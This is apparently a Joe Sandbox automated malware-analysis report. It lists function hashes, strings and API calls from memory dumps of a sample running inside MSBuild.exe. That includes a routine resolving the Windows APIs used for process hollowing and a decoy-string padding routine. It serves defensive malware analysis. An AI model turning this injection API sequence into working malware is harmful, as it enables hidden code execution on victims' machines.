Function 05B6B3C8 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 608a18a156852118dac9589bfb24396c8445bc10b36e2e87cced9f593a76b1f0
Instruction ID: 0d0de5bcaf9abe604cb2ef06a3a5b0a367134b6415bc7c16436c817311666bd5
Opcode Fuzzy Hash: 608a18a156852118dac9589bfb24396c8445bc10b36e2e87cced9f593a76b1f0
Instruction Fuzzy Hash: BA510D70A102098FDB44DFB9E5816AEBFF6FB88300F149529D518AB368DF756C49CB40

Function 031387B8 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669415902.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3130000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 338775971dc82bf5fa40a4fbaa894ffd631d0907fd157350af821cc2ff624f90
Instruction ID: 725c30dce5b7e7abbbbe87277faa40d53df4c4b45fbe7721aa475c8e53c45f23
Opcode Fuzzy Hash: 338775971dc82bf5fa40a4fbaa894ffd631d0907fd157350af821cc2ff624f90
Instruction Fuzzy Hash: 4B514870A042098FDB09EF79E9D079EBBF6FB89304F14952AD005AB368DB785809CF50

Function 0605D4C8 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684963539.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6050000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a35f2895edfe0d9bc43c9cc72df2f4e8d2e905ac30286ba46cf9e13ca171276
Instruction ID: 7d37c00439ad70c81e481716993e2b78584c3df298ef24c85abe9634e80e7cc1
Opcode Fuzzy Hash: 0a35f2895edfe0d9bc43c9cc72df2f4e8d2e905ac30286ba46cf9e13ca171276
Instruction Fuzzy Hash: 7941C2B4D003489FDB54CFA9D88469EFFF1EF09304F24902AE815AB294D7749845CF89

Function 03138A10 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669415902.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3130000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c8b5b11b24cea30f7c259586dfb8c09f25cc552c020166045da71722705d379
Instruction ID: 038b3aeb35e9c07dfcd099c4eda4180b7f8cc47ff2b7c92c01e6b1d7259fb62b
Opcode Fuzzy Hash: 4c8b5b11b24cea30f7c259586dfb8c09f25cc552c020166045da71722705d379
Instruction Fuzzy Hash: AD413FB1E056198BEB5CCF6B8D5079AFAF7BFC9200F14C1BA854CA7254DB700A858F15

Function 031389FF Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669415902.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3130000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3879ba075bfb23d5f29a8eb8204576edd4bad28ed1a4188d8f6052943b8814e1
Instruction ID: 6038e9f2f84c3d540bb3545b6232ae2c8e6121132ebf8dad93afb05b62dc01a4
Opcode Fuzzy Hash: 3879ba075bfb23d5f29a8eb8204576edd4bad28ed1a4188d8f6052943b8814e1
Instruction Fuzzy Hash: 784164B1E056588BEB5DCF6B8D5078EFAF7AFC9200F14C1BA854CA6258DB7006868F11

Function 05B60396 Relevance: 7.6, Strings: 6, Instructions: 70COMMON

Download Yara Rule

Strings

P, xrefs: 05B60E80
Hv&B, xrefs: 05B60DC0
2, xrefs: 05B60DCA
W, xrefs: 05B60EF9
L, xrefs: 05B60DFC
?, xrefs: 05B60EB8

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: 2$?$Hv&B$L$P$W
API String ID: 0-475053655
Opcode ID: 83355a02b0b64cec4bcc0676735e52b874ea191920b8ebb7b796caeeb64ba547
Instruction ID: 4aed6afe44cba61a065cab82ccae4d56542d3a0012e27c7ce54979a8338e5ff6
Opcode Fuzzy Hash: 83355a02b0b64cec4bcc0676735e52b874ea191920b8ebb7b796caeeb64ba547
Instruction Fuzzy Hash: 3631A3B4D056288FDB64DF2AC944799B6F1FF89304F1091EAD50DE7240EB396AC48F41

Function 05B61113 Relevance: 7.6, Strings: 6, Instructions: 58COMMON

Download Yara Rule

Strings

[, xrefs: 05B6113F
/, xrefs: 05B6116B
2, xrefs: 05B61151
J, xrefs: 05B61238
), xrefs: 05B6121D
2, xrefs: 05B61125

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: )$/$2$2$J$[
API String ID: 0-3619210194
Opcode ID: 695025a845120a8bd31929124b1876de99b6db1bea5041c9e9a7cfece0703a52
Instruction ID: ad92f0dec8c4ead64a1a6085c40e09a7678992c138ae6262b8b9426c027fc6de
Opcode Fuzzy Hash: 695025a845120a8bd31929124b1876de99b6db1bea5041c9e9a7cfece0703a52
Instruction Fuzzy Hash: F331C4B0D05A698FDB60DF19CD4479ABAB1FB44306F1001EA950DE7281DB799AC4CF00

Function 05B60098 Relevance: 7.5, Strings: 6, Instructions: 44COMMON

Download Yara Rule

Strings

_, xrefs: 05B600D1
I, xrefs: 05B60171
<, xrefs: 05B600DB
=, xrefs: 05B60118
1, xrefs: 05B6012A
c, xrefs: 05B600B0

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: 1$<$=$I$_$c
API String ID: 0-476438746
Opcode ID: 4c529e3fd5ae530ece4a838b65fc2cf03e43009826e3b5a3d95474767e0c6bcb
Instruction ID: 89efb45ef7b081027bbac3d3ee1e87fc8bd59f640c9eccdbb87980c73678c97e
Opcode Fuzzy Hash: 4c529e3fd5ae530ece4a838b65fc2cf03e43009826e3b5a3d95474767e0c6bcb
Instruction Fuzzy Hash: 9B21B6B0D14A288BEB60DF25CD4479EB6F6BF88306F1041E9C10CE7280EB799AC09F00

Function 05B602BE Relevance: 6.3, Strings: 5, Instructions: 36COMMON

Download Yara Rule

Strings

N, xrefs: 05B6036A
D, xrefs: 05B60360
., xrefs: 05B6033A
Y, xrefs: 05B60375
f, xrefs: 05B60306

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: .$D$N$Y$f
API String ID: 0-62446028
Opcode ID: b34c7244db22b1895224f469a5d13d48d69caeac245ffa6194417cda2a9365fd
Instruction ID: 49c5ffc8ef72d72da85e4a2a4691497483050c5a418c1631a5ed86dce03f0064
Opcode Fuzzy Hash: b34c7244db22b1895224f469a5d13d48d69caeac245ffa6194417cda2a9365fd
Instruction Fuzzy Hash: 0C11B0B4D01A688FDBA0DF18CD5879ABBB1BB49306F1010E9D10DE7280D7795EC88F01

Function 05B60F08 Relevance: 5.0, Strings: 4, Instructions: 43COMMON

Download Yara Rule

Strings

J, xrefs: 05B60F22
., xrefs: 05B60F36
[, xrefs: 05B60FE7
8, xrefs: 05B60F9F

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: .$8$J$[
API String ID: 0-1351512189
Opcode ID: c2d3b73e0257ff7db96ff6dbf445b48f28a1b9c607d894017ba8fbb14fcb6c6c
Instruction ID: 218e73a5a20da4a1f630f31951a97c2d20c033c43f88c3c239a7a063871891b7
Opcode Fuzzy Hash: c2d3b73e0257ff7db96ff6dbf445b48f28a1b9c607d894017ba8fbb14fcb6c6c
Instruction Fuzzy Hash: 4721B2B4D046298FDB60DF29CD4879ABAB1FB49305F5045E9D60DE7280EB399AC4CF00

Function 05B6170C Relevance: 5.0, Strings: 4, Instructions: 39COMMON

Download Yara Rule

Strings

O, xrefs: 05B61728
5, xrefs: 05B6178F
4, xrefs: 05B61756
7, xrefs: 05B617CC

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: 4$5$7$O
API String ID: 0-759388210
Opcode ID: ebd3077465ef266bfd57026fe8be1d5007978269569a0a9ee3887f5180d8967c
Instruction ID: 7e3a38ecc0b63982b20a445b986790922a66e6f27711043c48b9a8d12fa402ea
Opcode Fuzzy Hash: ebd3077465ef266bfd57026fe8be1d5007978269569a0a9ee3887f5180d8967c
Instruction Fuzzy Hash: 9511B6B0E05A698FDBA0DF29CD4439ABAB5BF48306F1051E9D10DE7280EB795AC4CF01

Function 05B61E91 Relevance: 5.0, Strings: 4, Instructions: 37COMMON

Download Yara Rule

Strings

M, xrefs: 05B61F38
B, xrefs: 05B61EB1
I, xrefs: 05B61EDF
h, xrefs: 05B61EE9

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: B$I$M$h
API String ID: 0-1656088576
Opcode ID: 731536c207bb93ac8ee643f4b08949a932cce54e5c5b6329f2d80686f043ff14
Instruction ID: 5c3427a257968b8a3265bc090998da3b6b13cf1730aa2f780545f09f5996fe38
Opcode Fuzzy Hash: 731536c207bb93ac8ee643f4b08949a932cce54e5c5b6329f2d80686f043ff14
Instruction Fuzzy Hash: 3C11CEB0805A288FDB61DF26C84439ABBF1BF89305F1045EAC50DE7280EB795AC4DF10

Analysis Process: MSBuild.exePID: 7280, Parent PID: 7252COMMON

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	40

Executed Functions

Function 00417A40 Relevance: 286.0, APIs: 121, Strings: 42, Instructions: 726
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,00E56170), ref: 00417A55
GetProcAddress.KERNEL32(74DD0000,00E56430), ref: 00417A6D
GetProcAddress.KERNEL32(74DD0000,00E57300), ref: 00417A86
GetProcAddress.KERNEL32(74DD0000,00E57288), ref: 00417A9E
GetProcAddress.KERNEL32(74DD0000,00E57450), ref: 00417AB6
GetProcAddress.KERNEL32(74DD0000,00E574B0), ref: 00417ACF
GetProcAddress.KERNEL32(74DD0000,00E50DC0), ref: 00417AE7
GetProcAddress.KERNEL32(74DD0000,00E573D8), ref: 00417AFF
GetProcAddress.KERNEL32(74DD0000,00E572E8), ref: 00417B18
GetProcAddress.KERNEL32(74DD0000,00E57270), ref: 00417B30
GetProcAddress.KERNEL32(74DD0000,00E57258), ref: 00417B48
GetProcAddress.KERNEL32(74DD0000,00E563D0), ref: 00417B61
GetProcAddress.KERNEL32(74DD0000,00E56150), ref: 00417B79
GetProcAddress.KERNEL32(74DD0000,00E56230), ref: 00417B91
GetProcAddress.KERNEL32(74DD0000,00E563F0), ref: 00417BAA
GetProcAddress.KERNEL32(74DD0000,00E57480), ref: 00417BC2
GetProcAddress.KERNEL32(74DD0000,00E572B8), ref: 00417BDA
GetProcAddress.KERNEL32(74DD0000,00E50CD0), ref: 00417BF3
GetProcAddress.KERNEL32(74DD0000,00E56490), ref: 00417C0B
GetProcAddress.KERNEL32(74DD0000,00E572D0), ref: 00417C23
GetProcAddress.KERNEL32(74DD0000,00E573A8), ref: 00417C3C
GetProcAddress.KERNEL32(74DD0000,00E573C0), ref: 00417C54
GetProcAddress.KERNEL32(74DD0000,00E57360), ref: 00417C6C
GetProcAddress.KERNEL32(74DD0000,00E56250), ref: 00417C85
GetProcAddress.KERNEL32(74DD0000,00E57318), ref: 00417C9D
GetProcAddress.KERNEL32(74DD0000,00E57330), ref: 00417CB5
GetProcAddress.KERNEL32(74DD0000,00E574E0), ref: 00417CCE
GetProcAddress.KERNEL32(74DD0000,00E574C8), ref: 00417CE6
GetProcAddress.KERNEL32(74DD0000,00E57348), ref: 00417CFE
GetProcAddress.KERNEL32(74DD0000,00E57378), ref: 00417D17
GetProcAddress.KERNEL32(74DD0000,00E574F8), ref: 00417D2F
GetProcAddress.KERNEL32(74DD0000,00E57390), ref: 00417D47
GetProcAddress.KERNEL32(74DD0000,00E573F0), ref: 00417D60
GetProcAddress.KERNEL32(74DD0000,00E50170), ref: 00417D78
GetProcAddress.KERNEL32(74DD0000,00E57408), ref: 00417D90
GetProcAddress.KERNEL32(74DD0000,00E57420), ref: 00417DA9
GetProcAddress.KERNEL32(74DD0000,00E56270), ref: 00417DC1
GetProcAddress.KERNEL32(74DD0000,00E57510), ref: 00417DD9
GetProcAddress.KERNEL32(74DD0000,00E56290), ref: 00417DF2
GetProcAddress.KERNEL32(74DD0000,00E575D0), ref: 00417E0A
GetProcAddress.KERNEL32(74DD0000,00E57540), ref: 00417E22
GetProcAddress.KERNEL32(74DD0000,00E56370), ref: 00417E3B
GetProcAddress.KERNEL32(74DD0000,00E562B0), ref: 00417E53
GetProcAddress.KERNEL32(74DD0000,CreateProcessA), ref: 00417E6A
GetProcAddress.KERNEL32(74DD0000,GetThreadContext), ref: 00417E80
GetProcAddress.KERNEL32(74DD0000,ReadProcessMemory), ref: 00417E97
GetProcAddress.KERNEL32(74DD0000,VirtualAllocEx), ref: 00417EAE
GetProcAddress.KERNEL32(74DD0000,ResumeThread), ref: 00417EC4
GetProcAddress.KERNEL32(74DD0000,WriteProcessMemory), ref: 00417EDB
GetProcAddress.KERNEL32(74DD0000,SetThreadContext), ref: 00417EF2
LoadLibraryA.KERNEL32(00E57558,004166E1), ref: 00417F03
LoadLibraryA.KERNEL32(00E57570), ref: 00417F15
LoadLibraryA.KERNEL32(00E57588), ref: 00417F27
LoadLibraryA.KERNEL32(00E57528), ref: 00417F38
LoadLibraryA.KERNEL32(00E575B8), ref: 00417F4A
LoadLibraryA.KERNEL32(00E575A0), ref: 00417F5C
LoadLibraryA.KERNEL32(00E575E8), ref: 00417F6D
LoadLibraryA.KERNEL32(00E59140), ref: 00417F7F
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00417F8F
GetProcAddress.KERNEL32(75290000,00E562D0), ref: 00417FAB
GetProcAddress.KERNEL32(75290000,00E59308), ref: 00417FC3
GetProcAddress.KERNEL32(75290000,00E4EE68), ref: 00417FDB
GetProcAddress.KERNEL32(75290000,00E59350), ref: 00417FF4
GetProcAddress.KERNEL32(75290000,00E562F0), ref: 0041800C
GetProcAddress.KERNEL32(734C0000,00E50D48), ref: 0041802C
GetProcAddress.KERNEL32(734C0000,00E56310), ref: 00418044
GetProcAddress.KERNEL32(734C0000,00E50D70), ref: 0041805C
GetProcAddress.KERNEL32(734C0000,00E591E8), ref: 00418075
GetProcAddress.KERNEL32(734C0000,00E59068), ref: 0041808D
GetProcAddress.KERNEL32(734C0000,00E56410), ref: 004180A5
GetProcAddress.KERNEL32(734C0000,00E56330), ref: 004180BE
GetProcAddress.KERNEL32(734C0000,00E59218), ref: 004180D6
GetProcAddress.KERNEL32(752C0000,00E56450), ref: 004180F2
GetProcAddress.KERNEL32(752C0000,00E56470), ref: 0041810A
GetProcAddress.KERNEL32(752C0000,00E59080), ref: 00418122
GetProcAddress.KERNEL32(752C0000,00E59278), ref: 0041813B
GetProcAddress.KERNEL32(752C0000,00E59950), ref: 00418153
GetProcAddress.KERNEL32(74EC0000,00E50DE8), ref: 00418173
GetProcAddress.KERNEL32(74EC0000,00E50E60), ref: 0041818B
GetProcAddress.KERNEL32(74EC0000,00E59110), ref: 004181A3
GetProcAddress.KERNEL32(74EC0000,00E59AB0), ref: 004181BC
GetProcAddress.KERNEL32(74EC0000,00E59970), ref: 004181D4
GetProcAddress.KERNEL32(74EC0000,00E50ED8), ref: 004181EC
GetProcAddress.KERNEL32(75BD0000,00E590B0), ref: 0041820C
GetProcAddress.KERNEL32(75BD0000,00E59910), ref: 00418224
GetProcAddress.KERNEL32(75BD0000,00E4EF78), ref: 0041823D
GetProcAddress.KERNEL32(75BD0000,00E59098), ref: 00418255
GetProcAddress.KERNEL32(75BD0000,00E590F8), ref: 0041826D
GetProcAddress.KERNEL32(75BD0000,00E59990), ref: 00418286
GetProcAddress.KERNEL32(75BD0000,00E598F0), ref: 0041829E
GetProcAddress.KERNEL32(75BD0000,00E59128), ref: 004182B6
GetProcAddress.KERNEL32(75BD0000,00E591D0), ref: 004182CF
GetProcAddress.KERNEL32(75A70000,00E59930), ref: 004182EB
GetProcAddress.KERNEL32(75A70000,00E590C8), ref: 00418303
GetProcAddress.KERNEL32(75A70000,00E59158), ref: 0041831C
GetProcAddress.KERNEL32(75A70000,00E592A8), ref: 00418334
GetProcAddress.KERNEL32(75A70000,00E590E0), ref: 0041834C
GetProcAddress.KERNEL32(75450000,00E599F0), ref: 00418368
GetProcAddress.KERNEL32(75450000,00E59AD0), ref: 00418380
GetProcAddress.KERNEL32(75DA0000,00E59A10), ref: 0041839C
GetProcAddress.KERNEL32(75DA0000,00E59248), ref: 004183B4
GetProcAddress.KERNEL32(6F090000,00E599B0), ref: 004183D4
GetProcAddress.KERNEL32(6F090000,00E59C10), ref: 004183EC
GetProcAddress.KERNEL32(6F090000,00E59B10), ref: 00418405
GetProcAddress.KERNEL32(6F090000,00E59170), ref: 0041841D
GetProcAddress.KERNEL32(6F090000,00E598B0), ref: 00418435
GetProcAddress.KERNEL32(6F090000,00E59A30), ref: 0041844E
GetProcAddress.KERNEL32(6F090000,00E599D0), ref: 00418466
GetProcAddress.KERNEL32(6F090000,00E59A70), ref: 0041847E
GetProcAddress.KERNEL32(6F090000,HttpQueryInfoA), ref: 00418495
GetProcAddress.KERNEL32(6F090000,InternetSetOptionA), ref: 004184AC
GetProcAddress.KERNEL32(75AF0000,00E59338), ref: 004184C8
GetProcAddress.KERNEL32(75AF0000,00E4EE78), ref: 004184E0
GetProcAddress.KERNEL32(75AF0000,00E591B8), ref: 004184F9
GetProcAddress.KERNEL32(75AF0000,00E59188), ref: 00418511
GetProcAddress.KERNEL32(75D90000,00E59B30), ref: 0041852D
GetProcAddress.KERNEL32(6E440000,00E59260), ref: 00418549
GetProcAddress.KERNEL32(6E440000,00E59A50), ref: 00418561
GetProcAddress.KERNEL32(6E440000,00E592D8), ref: 0041857A
GetProcAddress.KERNEL32(6E440000,00E591A0), ref: 00418592
GetProcAddress.KERNEL32(6CF70000,SymMatchString), ref: 004185AC

Strings

Xu, xrefs: 00417EFD
x, xrefs: 004184CE
pb, xrefs: 00417DBA
pc, xrefs: 00417E28
VirtualAllocEx, xrefs: 00417EA3
H, xrefs: 00418024
t, xrefs: 00417CBB
pu, xrefs: 00417F09
ResumeThread, xrefs: 00417EBE
Xr, xrefs: 00417B36
InternetSetOptionA, xrefs: 004184A1
WriteProcessMemory, xrefs: 00417ED0
0c, xrefs: 004180AB
(u, xrefs: 00417F32
ReadProcessMemory, xrefs: 00417E8C
CreateProcessA, xrefs: 00417E5F
h, xrefs: 00417FC9
0s, xrefs: 00417CA3
Pt, xrefs: 00417AA4
`s, xrefs: 00417C5A
SetThreadContext, xrefs: 00417EE7
Pb, xrefs: 00417C72
pd, xrefs: 00418103
@u, xrefs: 00417E10
SymMatchString, xrefs: 004185A6
Pd, xrefs: 004180EA
r, xrefs: 00417B05
0b, xrefs: 00417B7F
x, xrefs: 0041822A
dbghelp.dll, xrefs: 00417F85
p, xrefs: 0041804A
HttpQueryInfoA, xrefs: 0041848A
pa, xrefs: 00417A4D
, xrefs: 0041816B
GetThreadContext, xrefs: 00417E7A
t, xrefs: 00417D96
Pa, xrefs: 00417B72
pr, xrefs: 00417B29
u, xrefs: 00417F67
Hs, xrefs: 00417CEC
0d, xrefs: 00417A5B
xs, xrefs: 00417D04

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: t$(u$0b$0c$0d$0s$@u$CreateProcessA$GetThreadContext$H$Hs$HttpQueryInfoA$InternetSetOptionA$Pa$Pb$Pd$Pt$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$Xr$Xu$`s$dbghelp.dll$h$p$pa$pb$pc$pd$pr$pu$xs$x$x$$r$t$u
API String ID: 2238633743-513765887
Opcode ID: 99bfb0a2137326516713e216a9d450e559a5b5e2ebbfb807218a3a1d6a70ef3d
Instruction ID: 063c43ef11668f3b4bcf1e06991fb7fc39d12d8cee9b34c79393d9f3b317e2b6
Opcode Fuzzy Hash: 99bfb0a2137326516713e216a9d450e559a5b5e2ebbfb807218a3a1d6a70ef3d
Instruction Fuzzy Hash: 5A6211B9A106009FD714DFA5EE8A9263BFBF7C87013147519EA06C3364E7B8A841CF95

Function 00402000 Relevance: 70.1, APIs: 39, Strings: 1, Instructions: 124
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402014
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040201B
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402022
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402029
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402030
GetProcessHeap.KERNEL32(00000000,?,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040203B
RtlAllocateHeap.NTDLL(00000000,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402042
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402052
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402059
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402060
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402067
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040206E
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402079
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402080
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402087
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040208E
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402095
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020AB
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020B2
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020B9
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020C0
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020C7
lstrlenA.KERNEL32(?,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020CF
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020F0
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020F7
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 004020FE
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402105
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040210C
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 0040211C
lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ,?,?,?,AVAI4Z1EK55HX1Z,0000000F,004175FB), ref: 00402123
